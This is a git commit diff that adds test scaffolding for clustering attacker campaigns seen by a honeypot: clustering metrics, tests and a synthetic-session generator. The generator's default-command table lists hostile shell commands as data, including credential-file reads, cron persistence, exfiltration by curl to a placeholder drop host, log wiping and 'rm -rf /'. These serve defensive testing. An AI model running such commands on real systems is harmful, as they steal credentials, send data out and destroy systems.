feat(clustering): UKC phase enum + synthetic campaign factory + metric harness

Pre-implementation scaffolding for campaign clustering. The simulator is the spec — algorithm code follows once fixtures + metrics are stable.

* decnet/clustering/ukc.py — UKCPhase enum (19 phases across In/Through/Out stages), OBSERVABLE_PHASES set, stage_of() helper. Vocabulary aligns with future MITRE ATT&CK tagging so synthetic data and runtime phase inference don't need renaming when TTP-tagging lands.
* tests/factories/campaign_factory.py — YAML DSL parser + deterministic generator emitting truth-labeled SyntheticAttacker / SyntheticSession records. Validates phase names, warns on unobservable phases, supports multi-campaign + noise corpora.
* tests/clustering/metrics.py — pure-Python ARI / homogeneity / completeness / singleton_recall (no sklearn dep). Decided before any algorithm exists, on purpose.
* tests/fixtures/campaigns/lone_wolf.{yaml,expected.yaml} — fixture 3 from the design doc; simplest of the six, exercises the full pipeline with an identity-clusterer placeholder.
* development/CAMPAIGN_CLUSTERING.md — design spec for the feature.
* development/DEVELOPMENT_V2.md — note on DSL evolution path (concurrent phases, multi-actor per phase) deferred post-v1.
2026-04-26 06:29:10 -04:00
parent 3eb67c9400
commit 00254629f8
13 changed files with 1227 additions and 0 deletions
--- a/tests/clustering/__init__.py
+++ b/tests/clustering/__init__.py
--- a/tests/clustering/metrics.py
+++ b/tests/clustering/metrics.py
@@ -0,0 +1,179 @@
+"""
+Clustering metric harness — see development/CAMPAIGN_CLUSTERING.md §3.
+
+Decided BEFORE any clustering algorithm exists, on purpose: if the
+metrics get picked after seeing results, they'll flatter whatever the
+algorithm happens to produce.
+
+Four metrics, none on its own sufficient:
+
+  * Adjusted Rand Index — headline number, chance-corrected agreement
+    between predicted clusters and ground truth.
+  * Homogeneity — each predicted cluster contains only one true class.
+    Catches FALSE MERGES (campaigns wrongly fused).
+  * Completeness — every member of a true class lands in the same
+    predicted cluster. Catches FALSE SPLITS (one campaign wrongly torn
+    apart).
+  * Singleton recall — fraction of ground-truth singletons (lone wolves,
+    background noise) that are kept singleton by the clusterer.
+
+Implemented from first principles in pure Python so the test harness
+doesn't pull sklearn/numpy into the runtime dependency surface.
+"""
+from __future__ import annotations
+
+import math
+from collections import Counter, defaultdict
+
+
+def _comb2(n: int) -> int:
+    """C(n, 2) — number of unordered pairs from n items."""
+    return n * (n - 1) // 2 if n >= 2 else 0
+
+
+def adjusted_rand_index(truth: dict[str, str], pred: dict[str, str]) -> float:
+    """
+    Adjusted Rand Index between two clusterings over the same item set.
+
+    Range: typically [0, 1]; can dip negative for worse-than-random
+    labelings. 1.0 = identical partitions (up to label renaming),
+    0.0 ≈ chance agreement.
+
+    Both args map item_id -> cluster_id. Items must align exactly.
+    """
+    if set(truth) != set(pred):
+        raise ValueError(
+            "ARI requires identical item sets in truth and pred "
+            f"(missing in pred: {set(truth) - set(pred)}, "
+            f"missing in truth: {set(pred) - set(truth)})"
+        )
+    n = len(truth)
+    if n < 2:
+        return 1.0  # trivially "agree" on <2 items
+
+    # Build the contingency table n_ij = |cluster_i ∩ class_j|.
+    contingency: dict[tuple[str, str], int] = defaultdict(int)
+    for item, t_label in truth.items():
+        p_label = pred[item]
+        contingency[(p_label, t_label)] += 1
+
+    sum_comb = sum(_comb2(v) for v in contingency.values())
+    a_counts = Counter(pred.values())   # row sums (predicted clusters)
+    b_counts = Counter(truth.values())  # column sums (true classes)
+    sum_a = sum(_comb2(v) for v in a_counts.values())
+    sum_b = sum(_comb2(v) for v in b_counts.values())
+    total_pairs = _comb2(n)
+
+    expected = (sum_a * sum_b) / total_pairs if total_pairs else 0.0
+    max_index = (sum_a + sum_b) / 2
+    if max_index == expected:
+        # Degenerate: both clusterings are trivially equal in structure
+        # (both all-singletons, or both one-big-cluster). The math forces
+        # this — see the algebra of max_index = expected. The induced
+        # partitions are necessarily identical, so ARI is 1.0. (sklearn
+        # adopts the same convention.)
+        return 1.0
+    return (sum_comb - expected) / (max_index - expected)
+
+
+def _entropy(counts: list[int], total: int) -> float:
+    if total == 0:
+        return 0.0
+    h = 0.0
+    for c in counts:
+        if c == 0:
+            continue
+        p = c / total
+        h -= p * math.log(p)
+    return h
+
+
+def _conditional_entropy(
+    contingency: dict[tuple[str, str], int],
+    given_counts: dict[str, int],
+    total: int,
+) -> float:
+    """
+    H(rows | cols) in nats, for a contingency table keyed (row, col).
+
+    `given_counts` holds the marginal count of each col label (the
+    conditioning variable) and `total` the overall item count. Which
+    side is "class" and which is "cluster" depends on the caller:
+    homogeneity keys the table (truth, pred), completeness (pred, truth).
+    Returns 0.0 when `total` is 0.
+    """
+    if total == 0:
+        return 0.0
+    h = 0.0
+    # Group the cell counts by the conditioning (col) label.
+    by_col: dict[str, list[int]] = defaultdict(list)
+    for (row, col), v in contingency.items():
+        by_col[col].append(v)
+    # Weighted sum of per-column entropies: sum_c P(c) * H(rows | c).
+    for col, vs in by_col.items():
+        col_total = given_counts[col]
+        if col_total == 0:
+            continue
+        col_entropy = _entropy(vs, col_total)
+        h += (col_total / total) * col_entropy
+    return h
+
+
+def homogeneity(truth: dict[str, str], pred: dict[str, str]) -> float:
+    """
+    1 - H(truth | pred) / H(truth). 1.0 = each predicted cluster
+    contains only members of a single true class (no false merges).
+    """
+    n = len(truth)
+    if n == 0:
+        return 1.0
+    contingency: dict[tuple[str, str], int] = defaultdict(int)
+    for item, t in truth.items():
+        contingency[(t, pred[item])] += 1
+    truth_counts = Counter(truth.values())
+    pred_counts = Counter(pred.values())
+    h_truth = _entropy(list(truth_counts.values()), n)
+    if h_truth == 0:
+        return 1.0
+    h_truth_given_pred = _conditional_entropy(contingency, dict(pred_counts), n)
+    return 1.0 - (h_truth_given_pred / h_truth)
+
+
+def completeness(truth: dict[str, str], pred: dict[str, str]) -> float:
+    """
+    1 - H(pred | truth) / H(pred). 1.0 = all members of each true class
+    are assigned to the same predicted cluster (no false splits).
+    """
+    n = len(truth)
+    if n == 0:
+        return 1.0
+    contingency: dict[tuple[str, str], int] = defaultdict(int)
+    for item, t in truth.items():
+        contingency[(pred[item], t)] += 1
+    pred_counts = Counter(pred.values())
+    truth_counts = Counter(truth.values())
+    h_pred = _entropy(list(pred_counts.values()), n)
+    if h_pred == 0:
+        return 1.0
+    h_pred_given_truth = _conditional_entropy(contingency, dict(truth_counts), n)
+    return 1.0 - (h_pred_given_truth / h_pred)
+
+
+def singleton_recall(truth: dict[str, str], pred: dict[str, str]) -> float:
+    """
+    Fraction of ground-truth singletons that the clusterer kept singleton.
+
+    A "true singleton" is an item whose truth-campaign has exactly one
+    member (lone wolves, background noise scanners). The metric exists
+    because ARI/homogeneity/completeness all dilute the cost of a
+    clusterer that absorbs noise into real campaigns — and noise
+    absorption is the failure mode that makes campaign attribution
+    useless in practice.
+    """
+    truth_counts = Counter(truth.values())
+    true_singletons = [item for item, t in truth.items() if truth_counts[t] == 1]
+    if not true_singletons:
+        return 1.0
+    pred_counts = Counter(pred.values())
+    kept = sum(1 for item in true_singletons if pred_counts[pred[item]] == 1)
+    return kept / len(true_singletons)
+
+
+def score(truth: dict[str, str], pred: dict[str, str]) -> dict[str, float]:
+    """One-shot bundle the four metrics for fixture reports."""
+    return {
+        "adjusted_rand_index": adjusted_rand_index(truth, pred),
+        "homogeneity": homogeneity(truth, pred),
+        "completeness": completeness(truth, pred),
+        "singleton_recall": singleton_recall(truth, pred),
+    }
--- a/tests/clustering/test_campaign_factory.py
+++ b/tests/clustering/test_campaign_factory.py
@@ -0,0 +1,112 @@
+"""Determinism + DSL-validation tests for the synthetic campaign factory."""
+from __future__ import annotations
+
+import pytest
+
+from decnet.clustering.ukc import UKCPhase
+from tests.factories.campaign_factory import (
+    DSLValidationError,
+    generate,
+)
+
+
+def _minimal_spec() -> dict:
+    return {
+        "campaign": {
+            "id": "c-test",
+            "actors": [{"id": "a-1", "asn": 64512}],
+            "phases": [{"name": "delivery", "actor": "a-1"}],
+            "duration_days": 1,
+        }
+    }
+
+
+def test_generation_is_deterministic_given_seed() -> None:
+    spec = _minimal_spec()
+    a = generate(spec, seed=42)
+    b = generate(spec, seed=42)
+    # IDs are RNG-driven — same seed must produce identical IDs, not
+    # merely identical structure. Otherwise federation gossip and
+    # fixture diffing both break.
+    assert [att.attacker_id for att in a.attackers] == [
+        att.attacker_id for att in b.attackers
+    ]
+    assert [s.session_id for s in a.sessions] == [s.session_id for s in b.sessions]
+
+
+def test_different_seeds_produce_different_ids() -> None:
+    spec = _minimal_spec()
+    a = generate(spec, seed=1)
+    b = generate(spec, seed=2)
+    assert a.attackers[0].attacker_id != b.attackers[0].attacker_id
+
+
+def test_truth_labels_match_dsl() -> None:
+    spec = _minimal_spec()
+    corpus = generate(spec, seed=0)
+    assert corpus.attackers[0].truth_campaign_id == "c-test"
+    assert corpus.attackers[0].truth_actor_id == "a-1"
+    # truth_labels() returns the dict the metric harness consumes.
+    labels = corpus.truth_labels()
+    assert labels[corpus.attackers[0].attacker_id] == "c-test"
+
+
+def test_unobservable_phase_emits_no_events() -> None:
+    spec = _minimal_spec()
+    spec["campaign"]["phases"] = [
+        {"name": "reconnaissance", "actor": "a-1"},  # pre-target, unobservable
+        {"name": "delivery", "actor": "a-1"},
+    ]
+    corpus = generate(spec, seed=0)
+    # Only the delivery phase should produce sessions.
+    assert all(s.phase == UKCPhase.DELIVERY for s in corpus.sessions)
+    assert len(corpus.sessions) == 1
+
+
+def test_unknown_phase_name_raises() -> None:
+    spec = _minimal_spec()
+    spec["campaign"]["phases"] = [{"name": "make_coffee", "actor": "a-1"}]
+    with pytest.raises(DSLValidationError, match="unknown UKC phase"):
+        generate(spec, seed=0)
+
+
+def test_phase_referencing_unknown_actor_raises() -> None:
+    spec = _minimal_spec()
+    spec["campaign"]["phases"] = [{"name": "delivery", "actor": "ghost"}]
+    with pytest.raises(DSLValidationError, match="unknown actor"):
+        generate(spec, seed=0)
+
+
+def test_noise_scanners_are_truth_singletons() -> None:
+    spec = {
+        "corpus": {
+            "campaigns": [_minimal_spec()],
+            "noise": {"scanner_count": 5},
+        }
+    }
+    corpus = generate(spec, seed=0)
+    # 1 campaign actor + 5 noise scanners = 6 distinct truth campaigns.
+    truth_campaigns = {a.truth_campaign_id for a in corpus.attackers}
+    assert len(truth_campaigns) == 6
+
+
+def test_multi_actor_campaign_shares_campaign_id() -> None:
+    spec = {
+        "campaign": {
+            "id": "c-shared",
+            "actors": [
+                {"id": "a-1", "asn": 14061},
+                {"id": "a-2", "asn": 14061},
+            ],
+            "phases": [
+                {"name": "delivery", "actor": "a-1"},
+                {"name": "discovery", "actor": "a-2"},
+            ],
+            "duration_days": 1,
+        }
+    }
+    corpus = generate(spec, seed=0)
+    truth = corpus.truth_labels()
+    # Both attacker rows must point to the SAME truth_campaign_id —
+    # this is the property fixture 5 (multi_operator) hinges on.
+    assert set(truth.values()) == {"c-shared"}
--- a/tests/clustering/test_lone_wolf_fixture.py
+++ b/tests/clustering/test_lone_wolf_fixture.py
@@ -0,0 +1,92 @@
+"""
+End-to-end pipeline test for fixture 3 (lone_wolf).
+
+Loads the YAML spec, runs the synthetic generator, applies a placeholder
+identity clusterer (each attacker → its own cluster), scores against
+the expected bounds. This is the simplest of the six fixtures and is
+deliberately the first one wired up — its ground truth is all
+singletons, so an identity clusterer trivially passes, which proves the
+DSL→factory→metrics pipeline works before any real algorithm is built.
+
+Once the connected-components clusterer (CAMPAIGN_CLUSTERING.md §4)
+lands, this test will swap the placeholder for the real implementation
+and the same fixture must continue to pass.
+"""
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+import yaml
+
+from tests.clustering.metrics import score
+from tests.factories.campaign_factory import GeneratedCorpus, generate, load_yaml
+
+FIXTURE_DIR = Path(__file__).parent.parent / "fixtures" / "campaigns"
+
+
+def _identity_clusterer(corpus: GeneratedCorpus) -> dict[str, str]:
+    """Every attacker is its own cluster. Trivially correct on lone_wolf."""
+    return {a.attacker_id: f"cluster-{a.attacker_id}" for a in corpus.attackers}
+
+
+def test_lone_wolf_pipeline_passes_bounds() -> None:
+    spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml")
+    bounds = yaml.safe_load((FIXTURE_DIR / "lone_wolf.expected.yaml").read_text())
+
+    corpus = generate(spec, seed=0)
+    truth = corpus.truth_labels()
+    pred = _identity_clusterer(corpus)
+    metrics = score(truth, pred)
+
+    failures = []
+    for name, bound in bounds.items():
+        observed = metrics[name]
+        if observed < bound["min"]:
+            failures.append(f"{name}={observed:.3f} < min {bound['min']:.3f}")
+    assert not failures, "fixture bounds violated: " + "; ".join(failures)
+
+
+def test_lone_wolf_corpus_shape() -> None:
+    """Sanity: 1 wolf + 8 noise scanners = 9 attackers, 9 sessions."""
+    spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml")
+    corpus = generate(spec, seed=0)
+    assert len(corpus.attackers) == 9
+    assert len(corpus.sessions) == 9
+    # Every attacker is a truth-singleton (its own campaign).
+    truth_campaigns = {a.truth_campaign_id for a in corpus.attackers}
+    assert len(truth_campaigns) == 9
+
+
+def test_identity_clusterer_fails_on_a_real_campaign() -> None:
+    """
+    Sanity for the harness, NOT a test of the clusterer: a real
+    multi-actor campaign should make the placeholder identity clusterer
+    fail completeness, since each truth-campaign gets fragmented into
+    one-member clusters. If this didn't fail, our metrics would be
+    blind to false splits — and that's the entire point of fixture 4
+    and 5 in the design doc.
+    """
+    spec = {
+        "campaign": {
+            "id": "c-real",
+            "actors": [
+                {"id": "a-1", "asn": 14061},
+                {"id": "a-2", "asn": 14061},
+            ],
+            "phases": [
+                {"name": "delivery", "actor": "a-1"},
+                {"name": "discovery", "actor": "a-2"},
+            ],
+            "duration_days": 1,
+        }
+    }
+    corpus = generate(spec, seed=0)
+    truth = corpus.truth_labels()
+    pred = _identity_clusterer(corpus)
+    metrics = score(truth, pred)
+    # Identity clusterer splits the one true campaign across 2 clusters
+    # → completeness drops below 1.0. This must hold or our metrics
+    # aren't catching what they're supposed to catch.
+    assert metrics["completeness"] < 1.0
+    assert metrics["homogeneity"] == pytest.approx(1.0)  # no false merges, just splits
--- a/tests/clustering/test_metrics.py
+++ b/tests/clustering/test_metrics.py
@@ -0,0 +1,76 @@
+"""Sanity tests for the clustering metric harness."""
+from __future__ import annotations
+
+import pytest
+
+from tests.clustering.metrics import (
+    adjusted_rand_index,
+    completeness,
+    homogeneity,
+    score,
+    singleton_recall,
+)
+
+
+def test_perfect_agreement_scores_one() -> None:
+    truth = {"a": "C1", "b": "C1", "c": "C2", "d": "C2"}
+    # Same partition, different label names — clustering doesn't preserve
+    # names, so renamed-but-isomorphic must still score 1.0.
+    pred = {"a": "X", "b": "X", "c": "Y", "d": "Y"}
+    s = score(truth, pred)
+    assert s["adjusted_rand_index"] == pytest.approx(1.0)
+    assert s["homogeneity"] == pytest.approx(1.0)
+    assert s["completeness"] == pytest.approx(1.0)
+    assert s["singleton_recall"] == pytest.approx(1.0)
+
+
+def test_all_singletons_perfect() -> None:
+    truth = {"a": "A", "b": "B", "c": "C"}
+    pred = {"a": "1", "b": "2", "c": "3"}
+    s = score(truth, pred)
+    assert s["singleton_recall"] == pytest.approx(1.0)
+    assert s["adjusted_rand_index"] == pytest.approx(1.0)
+
+
+def test_false_merge_drops_homogeneity() -> None:
+    truth = {"a": "C1", "b": "C2"}
+    pred = {"a": "X", "b": "X"}  # merged two distinct campaigns
+    assert homogeneity(truth, pred) == pytest.approx(0.0)
+    # Completeness is fine (each true class lives in one cluster).
+    assert completeness(truth, pred) == pytest.approx(1.0)
+
+
+def test_false_split_drops_completeness() -> None:
+    truth = {"a": "C1", "b": "C1"}
+    pred = {"a": "X", "b": "Y"}  # split one campaign into two clusters
+    assert completeness(truth, pred) == pytest.approx(0.0)
+    assert homogeneity(truth, pred) == pytest.approx(1.0)
+
+
+def test_singleton_recall_penalises_noise_absorption() -> None:
+    # 3 lone wolves + 1 real campaign with 2 members.
+    truth = {"w1": "wolf1", "w2": "wolf2", "w3": "wolf3", "c1": "C", "c2": "C"}
+    # Clusterer absorbs all wolves into the campaign.
+    pred = dict.fromkeys(truth, "BIG")
+    assert singleton_recall(truth, pred) == pytest.approx(0.0)
+    # And a clusterer that keeps wolves singleton should score 1.0
+    # on this metric, regardless of what it does with the campaign.
+    pred_ok = {"w1": "1", "w2": "2", "w3": "3", "c1": "C", "c2": "C"}
+    assert singleton_recall(truth, pred_ok) == pytest.approx(1.0)
+
+
+def test_mismatched_item_sets_raises() -> None:
+    with pytest.raises(ValueError):
+        adjusted_rand_index({"a": "X"}, {"b": "Y"})
+
+
+def test_random_labels_low_ari() -> None:
+    # ARI of an arbitrary partition vs. ground truth should be near 0,
+    # not near 1 — this is the chance-correction guarantee.
+    truth = {f"i{n}": f"C{n // 4}" for n in range(20)}
+    # Pred that ignores truth: just shuffles items into 5 buckets in
+    # an order uncorrelated with truth.
+    pred = {f"i{n}": f"X{(n * 7) % 5}" for n in range(20)}
+    ari = adjusted_rand_index(truth, pred)
+    # Loose bound — the point is "much closer to 0 than to 1".
+    assert ari < 0.3
--- a/tests/factories/__init__.py
+++ b/tests/factories/__init__.py
--- a/tests/factories/campaign_factory.py
+++ b/tests/factories/campaign_factory.py
@@ -0,0 +1,381 @@
+"""
+Synthetic campaign generator — see development/CAMPAIGN_CLUSTERING.md.
+
+Reads a YAML campaign DSL describing actors, UKC phases, and tool
+signatures, and emits truth-labeled SyntheticAttacker / SyntheticSession
+records for the clustering test harness.
+
+Truth labels (`truth_campaign_id`, `truth_actor_id`) are part of the
+emitted records so the metric harness can score predicted clusters
+against ground truth without re-parsing the DSL. Production code that
+later writes the same shape into real DB tables MUST strip these fields
+before clustering runs — otherwise the algorithm trivially passes by
+reading the answer key.
+
+Determinism: given the same YAML and seed, two runs produce identical
+records (including IDs). This is a load-bearing property — fixture
+expectations are checked against the same seed every CI run.
+"""
+from __future__ import annotations
+
+import hashlib
+import random
+import uuid
+from dataclasses import dataclass, field
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+from typing import Any
+
+import yaml
+
+from decnet.clustering.ukc import OBSERVABLE_PHASES, UKCPhase
+
+
+@dataclass
+class SyntheticSession:
+    session_id: str
+    attacker_id: str
+    decky_id: str
+    started_at: datetime
+    duration_s: float
+    phase: UKCPhase
+    commands: list[str]
+    credentials_tried: list[tuple[str, str]]
+    payload_hash: str | None
+    c2_callback: str | None
+    truth_campaign_id: str
+    truth_actor_id: str
+
+
+@dataclass
+class SyntheticAttacker:
+    attacker_id: str
+    ip: str
+    asn: int
+    ja3: str | None
+    hassh: str | None
+    first_seen: datetime
+    last_seen: datetime
+    truth_campaign_id: str
+    truth_actor_id: str
+    sessions: list[SyntheticSession] = field(default_factory=list)
+
+
+@dataclass
+class GeneratedCorpus:
+    """Output of the factory — what the clusterer consumes."""
+    attackers: list[SyntheticAttacker]
+    # Convenience: flat list of every session across every attacker.
+    sessions: list[SyntheticSession]
+
+    def truth_labels(self) -> dict[str, str]:
+        """attacker_id -> truth_campaign_id, the oracle the clusterer is scored against."""
+        return {a.attacker_id: a.truth_campaign_id for a in self.attackers}
+
+
+# ─── Phase defaults ─────────────────────────────────────────────────────────
+# When the DSL doesn't specify tool_signature commands for a phase, fall
+# back to these. Keeps fixtures terse without making the factory invent
+# data ad-hoc per call.
+
+_PHASE_DEFAULT_COMMANDS: dict[UKCPhase, list[str]] = {
+    UKCPhase.DELIVERY: [],  # delivery is mostly network-level, no shell commands
+    UKCPhase.EXPLOITATION: [],
+    UKCPhase.DISCOVERY: ["whoami", "id", "uname -a", "ip route", "arp -a", "cat /etc/passwd"],
+    UKCPhase.CREDENTIAL_ACCESS: ["cat /etc/shadow", "find / -name id_rsa", "cat ~/.ssh/known_hosts"],
+    UKCPhase.PERSISTENCE: ["crontab -l", "echo '* * * * * /tmp/.x' | crontab -", "cat ~/.ssh/authorized_keys"],
+    UKCPhase.LATERAL_MOVEMENT: ["ssh -i /tmp/.k root@10.0.0.5", "scp /tmp/.x root@10.0.0.5:/tmp/"],
+    UKCPhase.COLLECTION: ["tar czf /tmp/loot.tgz /var/lib/mysql /home"],
+    UKCPhase.EXFILTRATION: ["curl -T /tmp/loot.tgz https://drop.example/"],
+    UKCPhase.EXECUTION: ["./payload"],
+    UKCPhase.PRIVILEGE_ESCALATION: ["sudo -l", "find / -perm -u=s 2>/dev/null"],
+    UKCPhase.DEFENSE_EVASION: ["history -c", "rm -rf /var/log/wtmp"],
+    UKCPhase.COMMAND_AND_CONTROL: [],  # beaconing observed at network layer
+    UKCPhase.PIVOTING: [],
+    UKCPhase.IMPACT: ["rm -rf /"],
+    UKCPhase.OBJECTIVES: [],
+}
+
+
+# ─── DSL parsing ────────────────────────────────────────────────────────────
+
+
+class DSLValidationError(ValueError):
+    """Raised when a campaign YAML is malformed or references unknown phases."""
+
+
+def _validate_campaign_spec(spec: dict[str, Any]) -> list[str]:
+    """Return list of warnings (e.g. unobservable phases). Raises on hard errors."""
+    if "campaign" not in spec:
+        raise DSLValidationError("missing top-level 'campaign' key")
+    c = spec["campaign"]
+    for key in ("id", "actors", "phases"):
+        if key not in c:
+            raise DSLValidationError(f"campaign missing required key: {key}")
+
+    actor_ids = {a["id"] for a in c["actors"]}
+    if not actor_ids:
+        raise DSLValidationError("campaign must declare at least one actor")
+
+    warnings: list[str] = []
+    for i, ph in enumerate(c["phases"]):
+        if "name" not in ph:
+            raise DSLValidationError(f"phase[{i}] missing 'name'")
+        try:
+            phase_enum = UKCPhase(ph["name"])
+        except ValueError as exc:
+            raise DSLValidationError(
+                f"phase[{i}] has unknown UKC phase '{ph['name']}'"
+            ) from exc
+        if phase_enum not in OBSERVABLE_PHASES:
+            warnings.append(
+                f"phase '{ph['name']}' is pre-target / unobservable from a "
+                f"honeypot; no events will be emitted for it"
+            )
+        # Single-actor campaigns can omit phase.actor; multi-actor must specify.
+        if "actor" in ph and ph["actor"] not in actor_ids:
+            raise DSLValidationError(
+                f"phase[{i}] references unknown actor '{ph['actor']}'"
+            )
+    return warnings
+
+
+# ─── Generator ──────────────────────────────────────────────────────────────
+
+
+def _stable_uuid(rng: random.Random, prefix: str) -> str:
+    """Deterministic UUID-shaped identifier driven by the seeded RNG."""
+    raw = rng.randbytes(16)
+    return f"{prefix}-{uuid.UUID(bytes=raw)}"
+
+
+def _stable_ip(rng: random.Random) -> str:
+    """Pick a routable-looking IPv4 in non-RFC1918 space."""
+    # Avoid 10/8, 172.16/12, 192.168/16, 127/8, 0/8, multicast 224+.
+    while True:
+        a = rng.randint(1, 223)
+        if a in (10, 127):
+            continue
+        b = rng.randint(0, 255)
+        if a == 172 and 16 <= b <= 31:
+            continue
+        if a == 192 and b == 168:
+            continue
+        c = rng.randint(0, 255)
+        d = rng.randint(1, 254)
+        return f"{a}.{b}.{c}.{d}"
+
+
+def _payload_hash(seed: str) -> str:
+    return hashlib.sha256(seed.encode()).hexdigest()
+
+
+def _hour_to_offset(rng: random.Random, day_start: datetime, hour: int, jitter_s: int) -> datetime:
+    base = day_start.replace(hour=hour, minute=0, second=0, microsecond=0)
+    return base + timedelta(seconds=rng.randint(-jitter_s, jitter_s) + rng.randint(0, 3600))
+
+
+def generate(spec: dict[str, Any], *, seed: int = 0) -> GeneratedCorpus:
+    """
+    Produce a deterministic synthetic corpus from a parsed YAML spec.
+
+    The spec mirrors the schema documented in CAMPAIGN_CLUSTERING.md.
+    Multiple campaigns + a noise block can be combined by wrapping them
+    in a top-level `corpus:` key; otherwise a single `campaign:` is
+    expected.
+
+    A single `random.Random(seed)` drives every ID, IP and timestamp, so
+    the same spec and seed yield the same records. Campaigns are emitted
+    in declared order, then noise scanners. Raises DSLValidationError
+    (from _validate_campaign_spec) on a malformed campaign.
+    """
+    rng = random.Random(seed)
+
+    campaigns: list[dict[str, Any]]
+    noise_cfg: dict[str, Any]
+    if "corpus" in spec:
+        campaigns = spec["corpus"].get("campaigns", [])
+        # `noise:` may be present but null in YAML; normalise to {}.
+        noise_cfg = spec["corpus"].get("noise", {}) or {}
+    else:
+        # Bare `campaign:` spec — treat it as a one-campaign corpus.
+        campaigns = [spec]
+        noise_cfg = {}
+
+    attackers: list[SyntheticAttacker] = []
+    sessions: list[SyntheticSession] = []
+
+    for c_wrapper in campaigns:
+        warnings = _validate_campaign_spec(c_wrapper)
+        # NOTE: validation warnings (e.g. unobservable phases) are
+        # currently discarded — they are neither printed nor attached to
+        # the returned corpus. TODO: surface them if tests need to
+        # assert on them.
+        for w in warnings:
+            _ = w
+        c = c_wrapper["campaign"]
+        _emit_campaign(c, rng, attackers, sessions)
+
+    _emit_noise(noise_cfg, rng, attackers, sessions)
+
+    return GeneratedCorpus(attackers=attackers, sessions=sessions)
+
+
+def _emit_campaign(
+    c: dict[str, Any],
+    rng: random.Random,
+    attackers: list[SyntheticAttacker],
+    sessions: list[SyntheticSession],
+) -> None:
+    campaign_id = c["id"]
+    duration_days = int(c.get("duration_days", 1))
+    pause_windows: list[tuple[int, int]] = [
+        tuple(p) for p in c.get("pause_windows", [])  # type: ignore[misc]
+    ]
+
+    # Anchor the synthetic timeline at a fixed epoch so determinism holds
+    # across runs regardless of wall clock.
+    epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)
+
+    # One attacker record per actor — captures the cross-session identity
+    # the clusterer is supposed to recover. IPs may rotate per session
+    # for rotating ip_pool actors; we record the first/last observed IP
+    # on the attacker row and let session-level fields carry the rest.
+    actor_attackers: dict[str, SyntheticAttacker] = {}
+    for actor in c["actors"]:
+        a_id = _stable_uuid(rng, "att")
+        att = SyntheticAttacker(
+            attacker_id=a_id,
+            ip=_stable_ip(rng),
+            asn=int(actor.get("asn", 0)),
+            ja3=actor.get("ja3"),
+            hassh=actor.get("hassh"),
+            first_seen=epoch,
+            last_seen=epoch,
+            truth_campaign_id=campaign_id,
+            truth_actor_id=actor["id"],
+        )
+        actor_attackers[actor["id"]] = att
+        attackers.append(att)
+
+    # Walk phases in declared order. Each phase produces N sessions
+    # against random deckies (or a sticky one if previous_success).
+    decky_pool = [f"decky-{i:02d}" for i in range(1, 21)]
+    last_success_decky: dict[str, str] = {}
+
+    for phase_idx, ph in enumerate(c["phases"]):
+        phase = UKCPhase(ph["name"])
+        if phase not in OBSERVABLE_PHASES:
+            continue  # pre-target phase; emit nothing
+
+        actor_id = ph.get("actor") or c["actors"][0]["id"]
+        att = actor_attackers[actor_id]
+        actor_spec = next(a for a in c["actors"] if a["id"] == actor_id)
+
+        sig = ph.get("tool_signature", {}) or {}
+        commands = sig.get("commands", _PHASE_DEFAULT_COMMANDS[phase])
+        creds_list = sig.get("credentials") or []
+        c2 = sig.get("c2_callback")
+        payload_seed = sig.get("payload_hash")
+        payload = _payload_hash(payload_seed) if payload_seed else None
+
+        target_sel = ph.get("target_selector", {}) or {}
+        n_sessions = int(target_sel.get("count", 1))
+        if target_sel.get("decky") == "previous_success":
+            decky_choices = [last_success_decky.get(actor_id, decky_pool[0])]
+        else:
+            decky_choices = decky_pool
+
+        # Schedule sessions across the campaign window, respecting the
+        # actor's hours_active_utc and pause_windows.
+        active_hours = actor_spec.get("hours_active_utc", list(range(24)))
+        jitter = int(actor_spec.get("jitter_seconds", 60))
+
+        for s_idx in range(n_sessions):
+            day = rng.randint(0, max(0, duration_days - 1))
+            if any(start <= day <= end for start, end in pause_windows):
+                # Skip into post-pause day.
+                later_days = [
+                    d for d in range(duration_days)
+                    if not any(s <= d <= e for s, e in pause_windows)
+                ]
+                if not later_days:
+                    continue
+                day = rng.choice(later_days)
+            hour = rng.choice(active_hours)
+            day_start = epoch + timedelta(days=day)
+            started_at = _hour_to_offset(rng, day_start, hour, jitter)
+            duration_s = float(ph.get("dwell_seconds", 5))
+
+            sess = SyntheticSession(
+                session_id=_stable_uuid(rng, "sess"),
+                attacker_id=att.attacker_id,
+                decky_id=rng.choice(decky_choices),
+                started_at=started_at,
+                duration_s=duration_s,
+                phase=phase,
+                commands=list(commands),
+                credentials_tried=[tuple(p) for p in creds_list],  # type: ignore[misc]
+                payload_hash=payload,
+                c2_callback=c2,
+                truth_campaign_id=campaign_id,
+                truth_actor_id=actor_id,
+            )
+            sessions.append(sess)
+            att.sessions.append(sess)
+            if started_at < att.first_seen or att.first_seen == epoch:
+                att.first_seen = started_at
+            if started_at > att.last_seen:
+                att.last_seen = started_at
+            # If this phase is a "successful entry," remember the decky
+            # for any subsequent previous_success target_selector.
+            if phase in (UKCPhase.EXPLOITATION, UKCPhase.PERSISTENCE):
+                last_success_decky[actor_id] = sess.decky_id
+
+
+def _emit_noise(
+    noise_cfg: dict[str, Any],
+    rng: random.Random,
+    attackers: list[SyntheticAttacker],
+    sessions: list[SyntheticSession],
+) -> None:
+    """Background scanners — opportunistic, no shared signals, singletons."""
+    n_scanners = int(noise_cfg.get("scanner_count", 0))
+    if n_scanners <= 0:
+        return
+    epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)
+    for i in range(n_scanners):
+        scanner_id = f"noise-scanner-{i:04d}"
+        att = SyntheticAttacker(
+            attacker_id=_stable_uuid(rng, "att"),
+            ip=_stable_ip(rng),
+            asn=rng.randint(1000, 65000),
+            ja3=None,
+            hassh=None,
+            first_seen=epoch,
+            last_seen=epoch,
+            truth_campaign_id=scanner_id,  # each scanner is its own truth-campaign
+            truth_actor_id=scanner_id,
+        )
+        attackers.append(att)
+        # One Delivery-phase session, no follow-up.
+        started = epoch + timedelta(seconds=rng.randint(0, 86400))
+        sess = SyntheticSession(
+            session_id=_stable_uuid(rng, "sess"),
+            attacker_id=att.attacker_id,
+            decky_id=f"decky-{rng.randint(1, 20):02d}",
+            started_at=started,
+            duration_s=1.0,
+            phase=UKCPhase.DELIVERY,
+            commands=[],
+            credentials_tried=[],
+            payload_hash=None,
+            c2_callback=None,
+            truth_campaign_id=scanner_id,
+            truth_actor_id=scanner_id,
+        )
